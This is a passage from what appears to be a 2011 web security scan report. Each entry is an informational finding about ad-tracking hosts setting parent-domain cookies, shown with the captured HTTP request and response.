GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815; Domain=.33across.com; Expires=Mon, 23-Apr-2012 16:35:02 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Sun, 24 Apr 2011 16:35:02 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

17.126. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=2451 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303533727_1660:354055; uid=1_1303533727_1303179323923:6792170478871670; kwd=1_1303533727; sit=1_1303533727_3236:118:0_782:354404:354055; cre=1_1303533727; bpd=1_1303533727; apd=1_1303533727; scg=1_1303533727; ppd=1_1303533727; afl=1_1303533727

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:52 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303691572_1660:511900; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: uid=1_1303691572_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: kwd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: sit=1_1303691572_2451:0:0_3236:157963:157845_782:512249:511900; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: cre=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: bpd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: apd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: scg=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: ppd=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Set-Cookie: afl=1_1303691572; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:32:52 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 00:32:52 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 281

<!-- campaign #7637 is NOT eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(
...[SNIP]...

17.127. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102119&mt_adid=100377&v1=&v2=&v3=&s1=&s2=&s3=&ord=503629049 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303614126

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6317 25367
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 24 Apr 2011 03:08:32 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1303614512; domain=.mathtag.com; path=/; expires=Mon, 23-Apr-2012 03:08:32 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

17.128. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=936598256;fpan=u;fpa=;ns=1;url=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN553.158901.DATAXU%2FB5114832.6%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3DNERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy%3F;ref=http%3A%2F%2Fcdn.w55c.net%2Fi%2F0RkPQrQRFy_1341446950.html%3Frtbhost%3Drts-rr11.sldc.dataxu.net%26btid%3DNERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy%26ei%3DGOOGLE_CONTENTNETWORK%26wp_exchange%3DTbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA%26euid%3DQ0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn%26slotid%3DMQ%26fiu%3DMEYzTllTc2l3dw%26ciu%3DMFJrUFFyUVJGeQ%26reqid%3DNERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI%26ccw%3DSUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4%26bp%3D138%26zc%3DNzUyMDc%26v%3D0%26s%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_728_90_b.php%26;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303658406247;tzo=300;a=p-54O-h3cYFO1Zc;media=ad;labels=_imp.adserver.doubleclick%2C_imp.publisher.62154145%2C_imp.placement.234084063%2C_imp.creative.41537449 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EMcAFu8kjVmtjIMLyxuBAS0BywaBkQDe0ki5E_-CTDDIYIIKvTCkMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ib.adnxs.com/seg?add_code=impx-15953&member=30
Set-Cookie: d=EK4AFu8kjVmtjIMLyxuBATEBywaBkQDe0kyka4WR_4JMMMhgggq9MKQw; expires=Sat, 23-Jul-2011 15:20:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 24 Apr 2011 15:20:18 GMT
Server: QS


17.129. http://pixel.quantserve.com/pixel/p-01ujhAj7lIRP-.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-01ujhAj7lIRP-.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-01ujhAj7lIRP-.gif?r=101063243 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EFcAFu8kjVmtjIMLyxuBATUBzAaBsQDe0kyka4WR_4JMMMhgggv-JutlpDA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ib.adnxs.com/seg?add_code=impx-50185&member=30
Set-Cookie: d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw; expires=Sun, 24-Jul-2011 01:39:23 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 01:39:23 GMT
Server: QS


17.130. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fd49cb9a7122f52 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; ses2=12801^1&12142^1; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C0%2C1%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fd49cb9a7122f52; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

17.131. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=BDCxiNImEXo_HTPxCteYHrb_BGgsLOT9mPTO8gIYFdmr7x1BP_jQEEW2U7W2VkKeBr2cjrIkhngtwKA4Ni19Eg&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MRT/iview/302482408/direct;wi.160;hi.600/01/238930674?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB2Z05xT-0TaKrMcjhlQez64SsA-SwnI4C9I7TmxvcrtnbP7DkgAEQARgBINmitw84AFDRxLm5______8BYMnug4jwo-wSsgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RLgCGMACBMgClLCGGKgDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA%26num%3D1%26sig%3DAGiWqtx-OJWvpbCS73hYg0hYLIULa971Wg%26client%3Dca-pub-6888065668292638%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=CMHOO7uf_udLLq9eGtJ3PdQJcQ_K22BQHXQ-dT6incxd6ISB_q_vS5rapRhLZ6kjvFBMD_r71JCvgjjawylbas-n3UVMoc2HfetiqdcGK7-MifLpV7fqak3Dns_efbQIZw0xnwcn-ju7SUW_27p2BuIIvMb-MRyDgs7z-nEGMqA; fc=NVeBshHSVnoUxhcixGrBhDuuhRKDd8vnh1xheKiYPKd3AL7Gx9Az1OHn7o3KNmBFGJEeoEGIaoMAXW2vTWlmm73wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=l6Ri52mPIpyGluW6-u2eGbfU8wOnNN9b_0n8BcAiIkpsOep8dC-MOu_Vn8saV8FGlv3EoXMDiG_3MOMNAZoQ8Zp8ton9qyytc3wJggY-XZ9xG021Bg3dVOVsjw-527DQ-lQ43F1Ri9EfKWgyMuSUJA7iVTPo6xLeW82rZAWcMMn-0ge5B6bX-Jw_BSdBMhaJRceopGJpc2YjAVLP6yBcU90N40phyJxywLIOGGEKSw8ZoVJuroHICj-FGi_cY7Rd52uo68R-HwHiqzs9rfgwUoBC0YF5sFftF8hFGep-tyiZF_0ohQEDeKLZrcUSOm6EjZzcmrNZG35Zw0ulgG_qszvIkIaZ0ryfyTud8M9ew8c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:10 GMT; Path=/
Set-Cookie: pf=YRmUG_egcxJ1jioCGx9tK2GrdtjyNIcCUmgOmzrRm97N9THTGeI-F8umf6rZIImP1NBFClVarOFa_WCW8k8jSVduSr5oqf0X_-pWPDxsGEPbN4SL51TigxAiJq-uj4aXHRoJFl3mPlckn1wpclzDLQ7iVTPo6xLeW82rZAWcMMn-0ge5B6bX-Jw_BSdBMhaJRceopGJpc2YjAVLP6yBcU90N40phyJxywLIOGGEKSw8ZoVJuroHICj-FGi_cY7Rd52uo68R-HwHiqzs9rfgwUoBC0YF5sFftF8hFGep-tyiZF_0ohQEDeKLZrcUSOm6EjZzcmrNZG35Zw0ulgG_qswliy_Srlk4j3LntAATjDnkHFvcFf7JzHxAZo9UZBcv7F6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 24 Apr 2011 15:23:10 GMT

GIF89a.............!.......,...........D..;

17.132. http://r.vertster.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.vertster.com
Path:   /track/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/?recipe_id=68334&action_type=view&campaign_id=2630&thirdParty=true&page_id=1192&ipaddress=173.193.214.243&visit_id=46276302&url=http%3A//www.infusionsoft.com/&kw=&ref=&hostname=www.infusionsoft.com&os=Windows&browser=Chrome%2010&day=0&hour=20&daytype=Weekend&daytime=Evening&vvar=Not%20Set HTTP/1.1
Host: r.vertster.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:57 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 0.00400
Content-Transfer-Encoding: binary
Cache-Control: private
Content-Disposition: attachment; filename="pixel.gif"
Set-Cookie: 1192=46276302; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Set-Cookie: 46276302_campaignID=2630; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Set-Cookie: v1192_recipeID=68334; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Set-Cookie: v1192_domain=r.vertster.com; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Content-Length: 13112
Status: 200 OK
P3P: CP="NON DSP COR NID CUR OUR NOR"
Content-Type: image/gif

GIF89a.............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:11:41 "
...[SNIP]...

17.133. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 12:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.801362.0XMC
Set-Cookie: C2=MMBtN5pqHIxFGQoovgg3sYQKSKMCItdxUhQ3WXMVIMa4FTFCKGexUhQ3gZMV1qKCaMrBpU7qIEysGTVkBgAoNXUVmZOiGgasjgAbUaUVNSPC73cBwB; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: 53765754=_4db4130c,4224517685,801362^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000801362/mnum=0000894
...[SNIP]...

17.134. http://sales.liveperson.net/hc/31254474/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/31254474/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/31254474/?&site=31254474&cmd=mTagInPage&lpCallId=756832087179-375232440419&protV=20&lpjson=1&page=http%3A//www.truecredit.com/&id=9714278555&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-truecredit-sales-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1818612326621797614; LivePersonID=-16601209214853-1303691674:-1:-1:-1:-1; HumanClickSiteContainerID_31254474=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; ASPSESSIONIDCSBCSATT=NJCNHPGCKECNJHDJEKKBCIBC; HumanClickACTIVE=1303691672769

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:35:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_31254474=STANDALONE; path=/hc/31254474
